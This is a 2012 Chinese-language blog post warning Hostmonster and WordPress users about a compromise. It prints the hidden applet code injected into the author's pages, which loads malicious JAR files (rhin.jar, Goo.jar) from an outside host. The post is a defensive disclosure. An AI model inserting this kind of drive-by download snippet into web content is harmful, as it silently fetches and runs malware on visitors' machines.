Tuesday, February 21, 2012

有在hostmonster租主機,或是有用wordpress的請注意

上個星期某一天開始,我發現我的blog,在瀏覽的時候會不定時出現要求browser的java plugin的訊息,當時沒特別注意,當時主機是租用hostmonster的virtual host,系統是用wordpress,確定wordpress主程式,theme跟plugin的版本都是最新的,也檢查過db,程式碼,確定都沒有哪邊有引用到jre的程式碼,而有問題的時候,網頁的html原始碼會被加入這樣的程式碼
<div id="content"><body><applet code='Tesia.class' archive='http://java.udownloadz.com/rhin.jar' width='1' height='1'><param name="dest" value="lxxt>337525<8268626=352i|i"></applet><applet code='Goo.class' archive='http://java.udownloadz.com/Goo.jar' width='1' height='1'> <param name="dest" value="lxxt>337525<8268626=352i|i"> </applet> </body>
網址會隨機,不過下載的檔案都一樣,rhin.jar , Goo.jar,這兩個是惡意程式的檔案名稱,而且還會偽造微軟(microsoft)的數位簽章,目前我也不確定是hostmonster本身的問題還是wordpress的問題,不過有用的人自己注意吧,因為合約也快到期,資料備份好之後,我搬走了XD

No comments:

Post a Comment